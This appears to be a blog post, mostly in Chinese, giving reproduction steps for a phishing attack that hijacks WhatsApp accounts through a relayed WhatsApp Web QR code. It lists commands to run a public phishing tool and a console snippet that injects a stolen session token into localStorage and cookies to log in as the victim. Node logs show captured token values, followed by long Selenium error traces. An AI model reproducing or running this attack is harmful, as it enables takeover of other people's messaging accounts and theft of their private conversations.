[Phishing] HIJACKING WHATSAPP ACCOUNTS USING WHATSAPP WEB

简单来说, 这是一个 phishing 的行为. 诱导用户扫描二维码, 获取 token.

黑客开启 http (express) & socket.io server. 当用户连接到 socket.io server 时, application 自动发送请求到 selenium instance (wd), selenium 开启 browser, 连接到 web.whatsapp.com. 抓取网页中的 qrcode, 并通过 websocket发送到 client. client 通过 JavaScript 呈现 QRcode 给用户.

一旦 QRCode 被扫描, whatsapp 会为 selenium 控制的 brower 认证, 并将 token 储存在 localStorage 和 document.cookie. 程序会导出 sensitive data 到目录下 secret 文件.

Reproduction Steps:

OS: MacOS

  • Run below commands
$ java -Dwebdriver.chrome.driver=chromedriver -jar selenium-server-standalone-3.0.1.jar
$ # new terminal
$ git clone https://github.com/Mawalu/whatsapp-phishing.git
$ cd whatsapp-phishing
$ npm install
$ node index.js
  • Open browser and visit http://localhost:8080
  • Scan QR Code
  • Open web.whatsapp.com.
  • Open your developer console
  • Enter the following code:
> var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
> login(t)
  • Reload the page
  • You should be logged in as the person who scanned the QR code

Nodejs Log:

➜  whatsapp-phishing git:(master) ✗ node index.js
Listening on 127.0.0.1, server_port 8090
a target connected
Starting to wait for tokens
Entering interval
{"s":{"WABrowserId":"\"1ZDQWkw8icR8SS0RmWRufQ==\"","debugCursor":"45","remember-me":"true","storage_test":"storage_test","ver":"1","whatsapp-mutex":"\"x519591963:init_1487302940513\""},"c":""}
1@SIGm3KfnFSmBWLMp+xK7KDKBipCCmAgaY02DwS8iXcXDZm2/L1+mmIIe,hV2jrhTC6DPob3CW1QbRK5avcyyfD7oqxPI3cXo2y10=,1ZDQWkw8icR8SS0RmWRufQ==
Entering interval
[snip...]

Selenium Log:


Command duration or timeout: 17 milliseconds
Build info: version: '3.0.1', revision: '1969d75', time: '2016-10-18 09:48:19 -0700'
System info: host: 'itsMBP.local', ip: '192.168.1.214', os.name: 'Mac OS X', os.arch: 'x86_64', os.version: '10.11.6', java.version: '1.8.0_101'
Driver info: org.openqa.selenium.chrome.ChromeDriver
Capabilities [{applicationCacheEnabled=false, rotatable=false, mobileEmulationEnabled=false, networkConnectionEnabled=false, chrome={chromedriverVersion=2.27.440174 (e97a722caafc2d3a8b807ee115bfb307f7d2cfd9), userDataDir=/var/folders/96/kfv86wt15h5_5m9bkl7hcnnr0000gn/T/.org.chromium.Chromium.8PQDsF}, takesHeapSnapshot=true, pageLoadStrategy=normal, databaseEnabled=false, handlesAlerts=true, hasTouchScreen=false, version=55.0.2883.95, platform=MAC, browserConnectionEnabled=false, nativeEvents=true, acceptSslCerts=true, locationContextEnabled=true, webStorageEnabled=true, browserName=chrome, takesScreenshot=true, javascriptEnabled=true, cssSelectorsEnabled=true, unexpectedAlertBehaviour=}]
Session ID: 56c8b5295bff3d84e152bbd92c8549fe
*** Element info: {Using=css selector, value=.qrcode}
	at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
	at org.openqa.selenium.remote.ErrorHandler.createThrowable(ErrorHandler.java:216)
	at org.openqa.selenium.remote.ErrorHandler.throwIfResponseFailed(ErrorHandler.java:168)
	at org.openqa.selenium.remote.RemoteWebDriver.execute(RemoteWebDriver.java:635)
	at org.openqa.selenium.remote.RemoteWebDriver.findElement(RemoteWebDriver.java:368)
	at org.openqa.selenium.remote.RemoteWebDriver.findElementByCssSelector(RemoteWebDriver.java:465)
	at org.openqa.selenium.By$ByCssSelector.findElement(By.java:430)
	at org.openqa.selenium.remote.RemoteWebDriver.findElement(RemoteWebDriver.java:360)
	at sun.reflect.GeneratedMethodAccessor13.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at org.openqa.selenium.support.events.EventFiringWebDriver$2.invoke(EventFiringWebDriver.java:103)
	at com.sun.proxy.$Proxy4.findElement(Unknown Source)
	at org.openqa.selenium.support.events.EventFiringWebDriver.findElement(EventFiringWebDriver.java:187)
	at org.openqa.selenium.remote.server.handler.FindElement.call(FindElement.java:48)
	at org.openqa.selenium.remote.server.handler.FindElement.call(FindElement.java:33)
	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
	at org.openqa.selenium.remote.server.DefaultSession$1.run(DefaultSession.java:176)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
	at java.lang.Thread.run(Thread.java:745)
11:45:05.843 WARN - Exception: no such session
  (Driver info: chromedriver=2.27.440174 (e97a722caafc2d3a8b807ee115bfb307f7d2cfd9),platform=Mac OS X 10.11.6 x86_64) (WARNING: The server did not provide any stacktrace information)
Command duration or timeout: 17 milliseconds
Build info: version: '3.0.1', revision: '1969d75', time: '2016-10-18 09:48:19 -0700'
System info: host: 'itsMBP.local', ip: '192.168.1.214', os.name: 'Mac OS X', os.arch: 'x86_64', os.version: '10.11.6', java.version: '1.8.0_101'
Driver info: org.openqa.selenium.chrome.ChromeDriver
Capabilities [{applicationCacheEnabled=false, rotatable=false, mobileEmulationEnabled=false, networkConnectionEnabled=false, chrome={chromedriverVersion=2.27.440174 (e97a722caafc2d3a8b807ee115bfb307f7d2cfd9), userDataDir=/var/folders/96/kfv86wt15h5_5m9bkl7hcnnr0000gn/T/.org.chromium.Chromium.8PQDsF}, takesHeapSnapshot=true, pageLoadStrategy=normal, databaseEnabled=false, handlesAlerts=true, hasTouchScreen=false, version=55.0.2883.95, platform=MAC, browserConnectionEnabled=false, nativeEvents=true, acceptSslCerts=true, locationContextEnabled=true, webStorageEnabled=true, browserName=chrome, takesScreenshot=true, javascriptEnabled=true, cssSelectorsEnabled=true, unexpectedAlertBehaviour=}]
Session ID: 56c8b5295bff3d84e152bbd92c8549fe
*** Element info: {Using=css selector, value=.qrcode}

Ref

Show Comments